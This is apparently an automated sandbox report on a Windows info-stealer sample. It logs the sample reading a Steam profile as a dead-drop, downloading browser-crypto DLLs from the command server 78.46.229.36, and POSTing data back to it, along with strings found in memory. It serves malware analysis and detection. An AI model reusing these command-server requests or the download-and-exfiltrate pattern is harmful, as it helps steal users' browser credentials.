                      Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00404420 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,lstrlenA,lstrlenA,HttpSendRequestA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,3_2_00404420
                      Source: global trafficHTTP traffic detected: GET /profiles/76561199658817715 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /sqlm.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
                      Source: unknownDNS traffic detected: queries for: steamcommunity.com
                      Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEBGHCBAEGDHIDGCBAECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
                      Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                      Source: file.exe, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                      Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                      Source: file.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                      Source: file.exe, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                      Source: file.exe, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: file.exe, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                      Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                      Source: file.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                      Source: file.exe, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                      Source: file.exe, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                      Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                      Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                      Source: file.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                      Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                      Source: file.exe, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://ocsp.digicert.com0
                      Source: file.exe, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://ocsp.digicert.com0A
                      Source: file.exe, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://ocsp.digicert.com0C
                      Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://ocsp.digicert.com0N
                      Source: file.exe, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://ocsp.digicert.com0X
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                      Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net
                      Source: file.exe, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://www.digicert.com/CPS0
                      Source: RegAsm.exe, RegAsm.exe, 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                      Source: RegAsm.exe, 00000003.00000002.1982390660.0000000019EED000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1977760885.0000000013F4C000.00000004.00000020.00020000.00000000.sdmp, sqlm[1].dll.3.drString found in binary or memory: http://www.sqlite.org/copyright.html.
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
                      Source: 76561199658817715[1].htm.3.drString found in binary or memory: https://78.46.229.36
                      Source: RegAsm.exe, 00000003.00000002.1976459689.00000000016E4000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1976459689.000000000162C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://78.46.229.36/
                      Source: RegAsm.exe, 00000003.00000002.1976459689.000000000162C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://78.46.229.36/2
                      Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://78.46.229.36/B
                      Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://78.46.229.36/D
                      Source: RegAsm.exe, 00000003.00000002.1976459689.00000000016E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://78.46.229.36/Hos
                      Source: RegAsm.exe, 00000003.00000002.1976459689.00000000016E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://78.46.229.36/U&
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://78.46.229.36/d
                      Source: RegAsm.exe, 00000003.00000002.1976459689.000000000162C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://78.46.229.36/freebl3.dll
                      Source: RegAsm.exe, 00000003.00000002.1976459689.000000000162C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://78.46.229.36/g
                      Source: RegAsm.exe, 00000003.00000002.1976459689.000000000162C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://78.46.229.36/mozglue.dll
                      Source: RegAsm.exe, 00000003.00000002.1976459689.000000000162C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://78.46.229.36/mozglue.dll2E
                      Source: RegAsm.exe, 00000003.00000002.1976459689.000000000162C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://78.46.229.36/msvcp140.dllnE
                      Source: RegAsm.exe, 00000003.00000002.1976459689.000000000162C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://78.46.229.36/msvcp140.dllxE
                      Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://78.46.229.36/nes
                      Source: RegAsm.exe, 00000003.00000002.1976459689.00000000016E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://78.46.229.36/nss3.dll
                      Source: RegAsm.exe, 00000003.00000002.1976459689.00000000016E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://78.46.229.36/nss3.dllr#4
                      Source: RegAsm.exe, 00000003.00000002.1976459689.00000000016E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://78.46.229.36/p&
                      Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://78.46.229.36/ramData
                      Source: RegAsm.exe, 00000003.00000002.1976459689.000000000162C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://78.46.229.36/softokn3.dll
                      Source: RegAsm.exe, 00000003.00000002.1976459689.000000000162C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://78.46.229.36/softokn3.dllBE
                      Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://78.46.229.36/sqlm.dll
                      Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://78.46.229.36/vcruntime140.dll
                      Source: RegAsm.exe, 00000003.00000002.1976459689.00000000016E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://78.46.229.36/~&
                      Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://78.46.229.36HIJKF
                      Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://78.46.229.36IDGIE
                      Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://78.46.229.36JEBKE
                      Source: ECFHIJKJ.3.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: 76561199658817715[1].htm.3.drString found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                      Source: ECFHIJKJ.3.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: ECFHIJKJ.3.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: ECFHIJKJ.3.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=96N66CvLHl
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&l=english&am
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPK
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&l=engli
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh&
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&l=en
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=kMVE
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=PyuRtGtUpR0t&l=englis
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=Wd0kCESeJquW&l=
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=engli
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=X93cgZRtuH6z&l=engli
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE
                      Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=swtsTjCD0CFZ&amp
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&l=engl
                      Source: 76561199658817715[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&l=
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=Zj8Lt-uyXH8R&
                      Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=KrKRjQbCfNh0&
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
                      Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                      Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=n5zImpoIZ8N
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
                      Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp
                      Source: ECFHIJKJ.3.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: ECFHIJKJ.3.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: ECFHIJKJ.3.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: https://help.steampowered.com/en/
                      Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: https://mozilla.org0/
                      Source: 76561199658817715[1].htm.3.drString found in binary or memory: https://steamcommunity.com/
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: https://steamcommunity.com/discussions/
                      Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/g
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                      Source: 76561199658817715[1].htm.3.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199658817715
